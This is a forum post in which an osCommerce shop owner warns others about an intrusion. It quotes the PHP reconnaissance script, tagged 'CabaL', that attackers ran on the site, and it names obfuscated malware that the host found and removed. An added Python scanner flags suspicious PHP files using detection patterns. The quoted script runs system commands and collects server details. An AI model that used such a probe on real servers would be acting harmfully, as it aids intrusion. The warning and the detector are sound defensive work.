
Hackers Entry Point into Oscommerce





I've noticed some strange activity on my website. Under Who's Online I've noticed the following URL:




I've clicked on it and the following code was submitted:



function ConvertBytes($number)
{
    $len = strlen($number);
    if($len < 4)
    {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6)
    {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9)
    {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }

    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "CabaL<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "CabaL<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";



I immediately banned all IPs originating from it that were active on my website.


I alerted my server host as well.


My host reported back that malicious code was found on my website which they removed.


/home/*******/public_html/admin/includes/configuration_cache.php: PHP.Obfus FOUND


I'm posting this info here as a warning to other users.


Kind Regards
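
For shop owners who want to check their own files after a report like this one, the following is an added example (not part of the original post and not osCommerce code): a Python triage script that flags PHP files combining command execution with the host-profiling calls seen in the quoted script. The eval-based obfuscation pattern and the review threshold are assumptions; a hit means the file needs manual review, not that it is malicious.

```python
import re
from pathlib import Path

# Function calls that appear in the script quoted in the post.
RECON_CALLS = ("php_uname", "system", "getcwd", "phpversion",
               "gethostbyname", "diskfreespace", "disk_total_space")
CALL_RE = re.compile(r"\b(" + "|".join(RECON_CALLS) + r")\s*\(", re.I)
# Assumption: a generic obfuscation idiom, not the host scanner's signature.
OBFUS_RE = re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def score_php(source):
    """Return the recon calls found and whether the file needs manual review."""
    calls = sorted({m.group(1).lower() for m in CALL_RE.finditer(source)})
    obfuscated = bool(OBFUS_RE.search(source))
    # Command execution plus two or more host-profiling calls is the
    # combination the quoted script shows; one call alone is common in shop code.
    recon = "system" in calls and len(calls) >= 3
    return {"calls": calls, "obfuscated": obfuscated, "review": recon or obfuscated}

def scan_tree(root):
    """Walk a web root and return {relative path: finding} for flagged PHP files."""
    root = Path(root)
    flagged = {}
    for path in sorted(root.rglob("*.php")):
        finding = score_php(path.read_text(errors="replace"))
        if finding["review"]:
            flagged[path.relative_to(root).as_posix()] = finding
    return flagged

# Constructed samples: three lines taken from the quoted script, and a harmless file.
SAMPLE_RECON = '<?php $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd();'
SAMPLE_CLEAN = '<?php echo "php: " . phpversion();'

if __name__ == "__main__":
    import sys
    for name, finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, finding["calls"], "obfuscated" if finding["obfuscated"] else "")
```

Run it with the path to the shop's web root as the only argument and compare each flagged file against a clean copy of the same osCommerce release.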



This topic is now archived and is closed to further replies.
